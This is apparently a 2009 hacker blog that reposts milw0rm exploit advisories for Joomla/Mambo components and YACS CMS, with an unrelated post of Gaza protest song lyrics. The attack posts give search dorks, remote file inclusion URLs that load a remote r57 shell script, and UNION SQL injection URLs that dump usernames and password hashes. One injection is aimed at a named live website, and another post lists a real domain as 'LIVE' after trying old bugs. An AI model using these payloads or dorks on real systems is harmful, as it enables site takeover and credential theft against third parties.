Welcome to Secure system

Secure your system

Backtrack

Get more Security Tools

Tuesday, February 17, 2009

Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability

6:55 AM secure your world No comments

######################################################
#
# MAMBO Modules SWmenu 4.0 (ImageManager.php) Remote File Include Vulnerabilities
#
######################################################
#
# script : http://mamboxchange.com/frs/download.php/8109/com_swmenufree4.0.zip
#
######################################################
#
# file : /ImageManager/Classes/ImageManager.php
#
######################################################
#
# Dork : index.php?option=com_swmenupro
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/ , Team Hell
#
######################################################
#
# require_once($mosConfig_absolute_path."/administrator/components/com_swmenupro/ImageManager/Classes/Files.php");
#
######################################################
#
# Exploit :
#
# Here one : http://www.example.com/MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
# Or : http://www.example.com/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
######################################################


---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| | Kof2002 | |OrGanza| |H@mLiT| |Snake12| |Root Shell|
|Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
|Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
| The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| | 020 | | abdulla00 " alz3eem" | | The_Viper |
All i know


#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

# milw0rm.com [2007-03-23]


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Read more »

Posted in: ,

Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities

6:50 AM secure your world No comments

==================================================
Joomla/Mambo Component Taskhopper 1.1 (/inc/ mosConfig_absolute_path) RFI
==================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================
Homepage: www.Hack-Teach.com
==================================================
Script Site : http://taskhopper.com/One1
==================================================
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================



#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-10]

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Read more »

Posted in: ,

Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability

6:45 AM secure your world No comments

+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
--found by breaker_unit and Don
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Qur'an component allows you to read and listen to the Qur'an (The Islamic Holybook) online. A great resource for Islamic sites running on Mambo Open Source. This component was originally developed for PHP-Nuke by Syed Rasel at http://www.nzmuslim.net and then modified/ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.

Key Features:

* Displaying the Qur'an in Arabic and its translations.
* Enhanced with search function (using any keywords or by chapter number and verse number).
* Arabic recitation for both listening and downloading.
* Very user friendly.
* Using mysql database instead of file text.

Available translations at the moment:

* English
* Indonesian

You can get them all at http://www.kyantonius.com.


+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
allinurl:"com_quran"
inurl:"/index.php?option=com_quran"
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--

Greetz to:
balcan-crew.org
milw0rm.com
h4cky0u.biz

# milw0rm.com [2008-02-15]



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Read more »

Posted in: ,

Song for Gaza

5:43 AM secure your world No comments

Dear friends,

I have been overwhelmed by the warmth and the friendship you have all given me in response to my song for Gaza, "We Will Not Go Down". I am doing my best to go through your numerous messages, emails and comments, and ask you to kindly bear with me until I am able to do so. Please forgive me if I am not able to respond to each and everyone of you; but please also know that I really appreciate your messages.

My original intention to donate proceeds from the sale of the MP3 to charity has been complicated by technical matters; therefore, I have decided to make the song available free of charge. I would like to request that after downloading the song from this page, you kindly donate directly to a charity or an organization dedicated to alleviate the suffering of the Palestinian people. Worthy of note is UNRWA (United Nations Relief and Works Agency for Palestine Refugees in the Near East), which has been helping Palestinian refugees since their dispossession in 1949. Please click here to donate through them: http://www.un.org/unrwa/

Thank you for your continued encouragement of my work as a musician, for your purchases of my CD (available here), and for spreading the song, the video and the message as you have been doing. I am grateful for every demonstration of support I have received from you, and for every thought and prayer that has gone to the people of Gaza.


Sincerely,

Michael Heart

=======================
for lyrics
WE WILL NOT GO DOWN (Song for Gaza)
(Composed by Michael Heart)
Copyright 2009


A blinding flash of white light
Lit up the sky over Gaza tonight
People running for cover
Not knowing whether they’re dead or alive

They came with their tanks and their planes
With ravaging fiery flames
And nothing remains
Just a voice rising up in the smoky haze

We will not go down
In the night, without a fight
You can burn up our mosques and our homes and our schools
But our spirit will never die
We will not go down
In Gaza tonight

Women and children alike
Murdered and massacred night after night
While the so-called leaders of countries afar
Debated on who’s wrong or right

But their powerless words were in vain
And the bombs fell down like acid rain
But through the tears and the blood and the pain
You can still hear that voice through the smoky haze

We will not go down
In the night, without a fight
You can burn up our mosques and our homes and our schools
But our spirit will never die
We will not go down
In Gaza tonight

Original From Michael Heart


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Read more »

Posted in:

Only tried old bugs

4:59 AM secure your world No comments



Domain Name : http://www.bergaul.com/

Server banner : Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_bwlimited/1.4

Operating system : Unix

Web server : Apache 2.x


LIVE
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Read more »

Posted in:

YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability

3:25 AM secure your world No comments

-----------------[remote file include]-----------------

script: YACS version 8.11

------------------------------------------------------------------

download from: http://www.yetanothercommunitysystem.com/file-fetch/814-20081130-yacs-8.11rc30.zip


==============================================
vul: /yacs/scripts/update_trailer.php line 21 23 25;


include_once $context['path_to_root'].'shared/safe.php'; 21
if(!class_exists('i18n'))
include_once $context['path_to_root'].'i18n/i18n.php'; 23
if(!class_exists('SQL'))
include_once $context['path_to_root'].'shared/sql.php'; 25



==============================================

dork: "Powered by yacs"
----------------------------------------------

xpl:

http://127.0.0.1/path/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

http://127.0.0.1/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

***************************************************

---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran]
---------------------------------------------------

# milw0rm.com [2009-02-16]


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Read more »

Posted in: ,

Thursday, February 12, 2009

Joomla and Mambo eWriting 1.2.1 Components - SQL injection

5:34 PM secure your world No comments

eWriting 1.2.1 - SQL injection

# Discovered by breaker_unit & Don
# BHack
# b4lc4n.org
# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l

Dorks:

"Powered by eWriting 1.2.1
allinurl:"com_ewriting"


Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--


Mambo
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--


+++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-03-10]


==============================================================
EXAMPLE FROM ME :

http://sexxxploration.com/cms/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.
Read more »

Posted in: ,
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Sweet Tomatoes Printable Coupons